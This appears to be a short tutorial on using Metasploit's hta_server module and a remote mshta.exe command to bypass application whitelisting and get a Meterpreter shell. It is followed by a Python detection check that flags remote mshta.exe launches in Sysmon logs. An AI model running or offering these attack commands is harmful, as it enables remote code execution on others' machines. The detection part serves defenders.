
While reviewing a bit of everything, I found something interesting that we should know about and that is, above all, very simple.

Launching an HTA file through mshta.exe is a useful and important attack because it can bypass application whitelisting.

First, open a terminal and run the following command to start Metasploit. If you don't have it installed, your first step is to install Metasploit.

msfconsole

Then we enter the following commands, each of which is easy to understand.

use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.100.4
msf exploit(windows/misc/hta_server) > exploit

Then we go to the victim machine and execute the following command.

mshta.exe //192.168.100.4:8080/oOmxE9j8KO.hta

After running the previous command on the victim machine, we immediately get a Meterpreter session and can start looking for anything we want.

The following command lists all the sessions we have open.

sessions

In this case we only have one:

sessions 1
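
From the defender's side, the step on the victim machine leaves a distinctive process-creation record: mshta.exe started with a remote target on its command line. The following Python check is an added example, not part of the original post; the event field names assume Sysmon Event ID 1 records, the sample events are constructed, and it covers http(s):// and \\host targets in addition to the //host form shown above.

```python
import re
from ntpath import basename  # Windows path rules, whatever OS the analysis runs on

# Start of an argument, followed by http(s)://, a scheme-less // (the form used
# in the walkthrough) or a \\UNC prefix, then the host name or address.
REMOTE_ARG = re.compile(r"(?:^|[\s\"'])(?:https?://|//|\\\\)([a-z0-9.\-]+)", re.I)
FIRST_TOKEN = re.compile(r'\s*(?:"[^"]*"|\S+)\s*(.*)', re.S)

def mshta_remote_host(event):
    """Return the remote host an mshta.exe process was pointed at, or None."""
    if basename(event.get("Image", "")).lower() != "mshta.exe":
        return None
    # Drop the executable token so its own path is never read as a target.
    m = FIRST_TOKEN.match(event.get("CommandLine", ""))
    hit = REMOTE_ARG.search(m.group(1)) if m else None
    return hit.group(1).lower() if hit else None

def find_remote_mshta(events):
    """Return (host, parent image, command line) for every flagged event."""
    return [(h, e.get("ParentImage", "?"), e["CommandLine"])
            for e in events if (h := mshta_remote_host(e))]

# Constructed sample events (assumed Sysmon Event ID 1 field names).
SAMPLE_EVENTS = [
    # The command from the walkthrough above: remote HTA, scheme-less form.
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"mshta.exe //192.168.100.4:8080/oOmxE9j8KO.hta"},
    # Local HTA opened from disk: not flagged.
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\help.hta"'},
    # A different program with a URL argument: not flagged.
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe http://198.51.100.7/readme.txt"},
    # Remote HTA given as a full URL (constructed address).
    {"Image": r"C:\Windows\SysWOW64\mshta.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\mshta.exe" "http://198.51.100.7/a.hta"'},
]

if __name__ == "__main__":
    for host, parent, cmd in find_remote_mshta(SAMPLE_EVENTS):
        print(f"ALERT mshta.exe -> {host} (parent: {parent}) :: {cmd}")
```

Legitimate remote HTA use is rare in most environments, so hits from this check are usually worth triaging together with the parent process and any outbound connection from mshta.exe.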

